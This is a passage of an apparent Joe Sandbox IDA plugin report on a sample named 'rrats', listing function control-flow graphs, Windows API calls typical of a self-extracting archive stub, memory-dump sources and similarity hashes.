                                                              control_flow_graph 1190 ca98e0-ca9901 call cbec50 1193 ca990c 1190->1193 1194 ca9903-ca9906 1190->1194 1196 ca990e-ca991f 1193->1196 1194->1193 1195 ca9908-ca990a 1194->1195 1195->1196 1197 ca9921 1196->1197 1198 ca9927-ca9931 1196->1198 1197->1198 1199 ca9933 1198->1199 1200 ca9936-ca9943 call ca6edb 1198->1200 1199->1200 1203 ca994b-ca996a CreateFileW 1200->1203 1204 ca9945 1200->1204 1205 ca99bb-ca99bf 1203->1205 1206 ca996c-ca998e GetLastError call cabb03 1203->1206 1204->1203 1208 ca99c3-ca99c6 1205->1208 1210 ca99c8-ca99cd 1206->1210 1215 ca9990-ca99b3 CreateFileW GetLastError 1206->1215 1208->1210 1211 ca99d9-ca99de 1208->1211 1210->1211 1212 ca99cf 1210->1212 1213 ca99ff-ca9a10 1211->1213 1214 ca99e0-ca99e3 1211->1214 1212->1211 1217 ca9a2e-ca9a39 1213->1217 1218 ca9a12-ca9a2a call cb0602 1213->1218 1214->1213 1216 ca99e5-ca99f9 SetFileTime 1214->1216 1215->1208 1219 ca99b5-ca99b9 1215->1219 1216->1213 1218->1217 1219->1208
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CA7760,?,00000005,?,00000011), ref: 00CA995F
                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CA7760,?,00000005,?), ref: 00CA99A2
                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                              • Instruction ID: a3b218c756548c5e7ec44cf139d3596cc0db730fc16133e03ca362589a30111a
                                                              • Opcode Fuzzy Hash: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                              • Instruction Fuzzy Hash: 0C3115305443867FE7209B34CC46BDBBB98FB06328F100B19F9B5961D1D7B5AA44CB95

                                                              Control-flow Graph

                                                              control_flow_graph 1249 cbb568-cbb581 PeekMessageW 1250 cbb5bc-cbb5be 1249->1250 1251 cbb583-cbb597 GetMessageW 1249->1251 1252 cbb599-cbb5a6 IsDialogMessageW 1251->1252 1253 cbb5a8-cbb5b6 TranslateMessage DispatchMessageW 1251->1253 1252->1250 1252->1253 1253->1250
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                              • IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                              • TranslateMessage.USER32(?), ref: 00CBB5AC
                                                              • DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                              • Instruction ID: 8af23210dca3a17d852ca747d23db509c157c7b28cf8cdaf25952a7b43684812
                                                              • Opcode Fuzzy Hash: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                              • Instruction Fuzzy Hash: CDF06D71E0221AABDB209FE6AC4CEDB7FACEE056917404415B519D2150EB74D609CBB1

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              • OleInitialize.OLE32(00000000), ref: 00CBAC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
                                                              • SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll
                                                              • API String ID: 3498096277-3360196438
                                                              • Opcode ID: 71b97543c348c97e38503ebaa6a4315ed4b1623cd9857f90c0b1630e988ff3f9
                                                              • Instruction ID: 8272c69b5e25e3c8e62dfbfc42204234d74b506de2a2d793bc88bc7ccd216bc4
                                                              • Opcode Fuzzy Hash: 71b97543c348c97e38503ebaa6a4315ed4b1623cd9857f90c0b1630e988ff3f9
                                                              • Instruction Fuzzy Hash: 67F01DB1D00209ABCB10AFAAD849AEFFFFCEF94700F00416AE515E2251DBB45605CFA1
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: 44f7083447d7afb38c5bb7674e571573068d0549dd20e7105fb03ee40d815d36
                                                              • Instruction ID: f1e191425bc3e1b91b6e20fcf4e2fe5d10b4f39f0754ecd775294a8a7b736170
                                                              • Opcode Fuzzy Hash: 44f7083447d7afb38c5bb7674e571573068d0549dd20e7105fb03ee40d815d36
                                                              • Instruction Fuzzy Hash: 00F065B2505235ABDB202F959C0AFFF7F98BF15B82F040466BE8796151E6B08940E6B1
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00CA9795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CA97AD
                                                              • GetLastError.KERNEL32 ref: 00CA97DF
                                                              • GetLastError.KERNEL32 ref: 00CA97FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: ca3a567687b76b76af4f41e8ba87fc60261d40bf4bd4b8168d4b00c54f741bec
                                                              • Instruction ID: 34b35ffb78987b836f174d5fc48e3209f09954d5739ec27d7d5b09daa75bc3cd
                                                              • Opcode Fuzzy Hash: ca3a567687b76b76af4f41e8ba87fc60261d40bf4bd4b8168d4b00c54f741bec
                                                              • Instruction Fuzzy Hash: A7118E30910206EBDF209F65C806B6D37B9FB43728F20892AF426C51D0D7789F44DB62
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00CC40EF,00000000,00000000,?,00CCACDB,00CC40EF,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue), ref: 00CCAD66
                                                              • GetLastError.KERNEL32(?,00CCACDB,00CC40EF,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000,00000364,?,00CC98B7), ref: 00CCAD72
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CCACDB,00CC40EF,00000000,00000000,00000000,?,00CCAED8,00000006,FlsSetValue,00CD7970,FlsSetValue,00000000), ref: 00CCAD80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 651da0135e84193e332c5252a3db2e2b0a4fa19ceefe218e35cb2142429a9a11
                                                              • Instruction ID: 553ae48909d9c9e812a16b72adcf0341c3d544859babc53c75bdc88cb6b9f974
                                                              • Opcode Fuzzy Hash: 651da0135e84193e332c5252a3db2e2b0a4fa19ceefe218e35cb2142429a9a11
                                                              • Instruction Fuzzy Hash: D301473260222AABC7214B79EC4CF5B7B98EF00BA67100229F817D3550DB20DD0186E2
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00CB1043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 00CB108A
                                                                • Part of subcall function 00CA6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6C54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Thread$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2655393344-3849766595
                                                              • Opcode ID: 9e54d7bc8c721b980e589cf4ed74b668997a7e6041e93ce2ec97dee1e35eeb41
                                                              • Instruction ID: dda9d09fb4c72039174b0027eb1aec8914a5510f2176e183392a857516f05960
                                                              • Opcode Fuzzy Hash: 9e54d7bc8c721b980e589cf4ed74b668997a7e6041e93ce2ec97dee1e35eeb41
                                                              • Instruction Fuzzy Hash: EE01FEB53443496FD334AF68AC51BBAB368EB80755F14003EFE4656180CAB168C54724
                                                              APIs
                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB1FE5
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB1FF6
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB2006
                                                                • Part of subcall function 00CB1FDD: _wcslen.LIBCMT ref: 00CB2014
                                                                • Part of subcall function 00CB1FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CAB371,?,?,00000000,?,?,?), ref: 00CB202F
                                                                • Part of subcall function 00CBAC04: SetCurrentDirectoryW.KERNELBASE(?,00CBAE72,C:\Users\user\Desktop,00000000,00CE946A,00000006), ref: 00CBAC08
                                                              • _wcslen.LIBCMT ref: 00CBAE8B
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,00CE946A,00000006), ref: 00CBAEC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryFileOperationString
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 1016385243-1246513382
                                                              • Opcode ID: e88d3757d3d330a6848d675c46594985830e2397d8614f342709029af41398c0
                                                              • Instruction ID: e6502f03bd5cc875e246e5a3bd0a55abc40e956164b8f8d8fdfe8b4c7012f3cf
                                                              • Opcode Fuzzy Hash: e88d3757d3d330a6848d675c46594985830e2397d8614f342709029af41398c0
                                                              • Instruction Fuzzy Hash: 5E015E71D0025965DF11ABA4DD0AEDF77FCAF08700F000465F506E3192E6B496449AA1
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00CAD343,00000001,?,?,?,00000000,00CB551D,?,?,?), ref: 00CA9F9E
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00CB551D,?,?,?,?,?,00CB4FC7,?), ref: 00CA9FE5
                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00CAD343,00000001,?,?), ref: 00CAA011
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$Handle
                                                              • String ID:
                                                              • API String ID: 4209713984-0
                                                              • Opcode ID: eddba78c8b4b6365e787c04116d073a608cf3749794dd66e826186f921368c03
                                                              • Instruction ID: 5575dd3a5c3a25e7b3f2a1ccbf6ee87316e5503082fc808df92a6160f1809a97
                                                              • Opcode Fuzzy Hash: eddba78c8b4b6365e787c04116d073a608cf3749794dd66e826186f921368c03
                                                              • Instruction Fuzzy Hash: FF31E23120434AAFDB14CF24D809B6EB7A5FF86719F04451DF99297290C775AE48CBA3
                                                              APIs
                                                                • Part of subcall function 00CAC27E: _wcslen.LIBCMT ref: 00CAC284
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA2D9
                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA30C
                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA329
                                                              Similarity
                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                              • String ID:
                                                              • API String ID: 2260680371-0
                                                              • Opcode ID: cd4bee3eb3a3c3569b87885c8190e285c1245200c7b83cd87b856870ae57b2ba
                                                              • Instruction ID: 7e0c7a03323bf1c8a32cb918d47633cd36790c9c1fbd9455507c9e8618236e69
                                                              • Opcode Fuzzy Hash: cd4bee3eb3a3c3569b87885c8190e285c1245200c7b83cd87b856870ae57b2ba
                                                              • Instruction Fuzzy Hash: 6F01F7312022126AEF31AB754C49BFD3798AF0B789F044416F912E60A1D764DB81D6B7
                                                              APIs
                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00CCB8B8
                                                              Strings
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 6c41aa06ee53d33018261184b9ea2846c7a1d8fcfa912aeeaddd926262f0469c
                                                              • Instruction ID: 35ba1e674e64f49a5df0fc87a8aaa5edf15bbd6896036090f3d85c4e76fa07ed
                                                              • Opcode Fuzzy Hash: 6c41aa06ee53d33018261184b9ea2846c7a1d8fcfa912aeeaddd926262f0469c
                                                              • Instruction Fuzzy Hash: FE41F67050428C9ADF218EA5CC85FEABBB9EB45304F1404EDE5DAC6142D335AE469B60
                                                              APIs
                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00CCAFDD
                                                              Strings
                                                              Similarity
                                                              • API ID: String
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 2568140703-3893581201
                                                              • Opcode ID: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                              • Instruction ID: dac727fe3992756c7fb12c2f1f32220721f276d8c0dcd5f4cb405abc965d7bab
                                                              • Opcode Fuzzy Hash: 4a747d107bb871ad10b3f0602ae1c44bbc20e20a3cd43ee765bcfd7ee2a54a44
                                                              • Instruction Fuzzy Hash: 3B014C3250510DBBCF026F90DC05EEE7F62EF08754F01425AFE1466261C6728A31EB81
                                                              APIs
                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CCA56F), ref: 00CCAF55
                                                              Strings
                                                              Similarity
                                                              • API ID: CountCriticalInitializeSectionSpin
                                                              • String ID: InitializeCriticalSectionEx
                                                              • API String ID: 2593887523-3084827643
                                                              • Opcode ID: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                              • Instruction ID: f8f0538449bb044e5f4bd483c9df1f43f6fcd7557c4b64606765a2899ec05608
                                                              • Opcode Fuzzy Hash: 61a3599f8fdadf73d6b75d71f4d6a42423ec63176d957921e5bc7d3d12dd1385
                                                              • Instruction Fuzzy Hash: F5F0B43264621CBFCF026F50CC1AE9D7F61EF04711F40416AFD099A360EA314A10A786
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: Alloc
                                                              • String ID: FlsAlloc
                                                              • API String ID: 2773662609-671089009
                                                              • Opcode ID: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                              • Instruction ID: 94ae5c6869b4db779ccb4566efea84c08086f339538c5e3cf6aeebcfa5f1bac9
                                                              • Opcode Fuzzy Hash: 0ad728546c387cf2d2426a2c060b3c3789e2867b08a2f9528dd9be7f654fc6d3
                                                              • Instruction Fuzzy Hash: 91E0E532A8621C7BC601AB65DC1AF6EBB94DB04721B4102AEF90697340DD715E1196DA
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBEAF9
                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                              Strings
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID: 3Qo
                                                              • API String ID: 1269201914-1944013411
                                                              • Opcode ID: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                              • Instruction ID: 021770638c5dd6bdfd92bdb09e37d73dff09b89c870cdf214e942e098575e569
                                                              • Opcode Fuzzy Hash: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                              • Instruction Fuzzy Hash: 70B012C629B4437C3908A2061E42CF7090DC4C0F90730803FF504C41C1DC814C026471
                                                              APIs
                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CCBA89,?,00000000), ref: 00CCBC64
                                                              • GetCPInfo.KERNEL32(00000000,00CCBA89,?,?,?,00CCBA89,?,00000000), ref: 00CCBC77
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                              • Instruction ID: 977381dbbbd8e00518c623df280d3d073a3020cc2a03f5ea096720697be780e7
                                                              • Opcode Fuzzy Hash: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                              • Instruction Fuzzy Hash: 0F513470D002559EDB209FF5C892FBABBE4EF41310F1844AED4A68B292D7359E46DB90
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CA9A50,?,?,00000000,?,?,00CA8CBC,?), ref: 00CA9BAB
                                                              • GetLastError.KERNEL32(?,00000000,00CA8411,-00009570,00000000,000007F3), ref: 00CA9BB6
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                              • Instruction ID: 8326a9fa10847b2be58e35ee6c3387fa97d6c916d03bf65f0100788cebc6d5e6
                                                              • Opcode Fuzzy Hash: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                              • Instruction Fuzzy Hash: E541CF305043438FDB34DF15F5865AAB7E5FBD6718F148A2EE8A283260D770AE458B61
                                                              APIs
                                                                • Part of subcall function 00CC97E5: GetLastError.KERNEL32(?,00CE1098,00CC4674,00CE1098,?,?,00CC40EF,?,?,00CE1098), ref: 00CC97E9
                                                                • Part of subcall function 00CC97E5: _free.LIBCMT ref: 00CC981C
                                                                • Part of subcall function 00CC97E5: SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC985D
                                                                • Part of subcall function 00CC97E5: _abort.LIBCMT ref: 00CC9863
                                                                • Part of subcall function 00CCBB4E: _abort.LIBCMT ref: 00CCBB80
                                                                • Part of subcall function 00CCBB4E: _free.LIBCMT ref: 00CCBBB4
                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                              • _free.LIBCMT ref: 00CCBA9F
                                                              • _free.LIBCMT ref: 00CCBAD5
                                                              Similarity
                                                              • API ID: _free$ErrorLast_abort
                                                              • String ID:
                                                              • API String ID: 2991157371-0
                                                              • Opcode ID: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                              • Instruction ID: 2ac9841de90c678c7fc9d914c852aca8e6e3e50586e18738530482f033867ee2
                                                              • Opcode Fuzzy Hash: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                              • Instruction Fuzzy Hash: 0131B631904209AFDB10EFE9D446F9DB7F5EF40320F25409EE9549B2A2EB329E45EB50
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA1E55
                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                              • _wcslen.LIBCMT ref: 00CA1EFD
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: 52cf5d35fdef34b401ef253f5eca2eb5a4e9cf32667f7e0b9356782d6aebe2fa
                                                              • Instruction ID: ec4268c25746a2dc193b7fef3fca47dd43f184ae0746ea50b409f9e658b91bdf
                                                              • Opcode Fuzzy Hash: 52cf5d35fdef34b401ef253f5eca2eb5a4e9cf32667f7e0b9356782d6aebe2fa
                                                              • Instruction Fuzzy Hash: E4317A7190424AAFCF11DF98D955AEEBBF6BF09304F24006EF845A7251CB325E00DB60
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: 6dca8e7239a7c81993cfe4a33acc5279718348e3f153fb8b37b06952a76f5777
                                                              • Instruction ID: 02bdfcfc4330122cc2bb46f624630084cfa334420d4c10ee8aa659808a3331a9
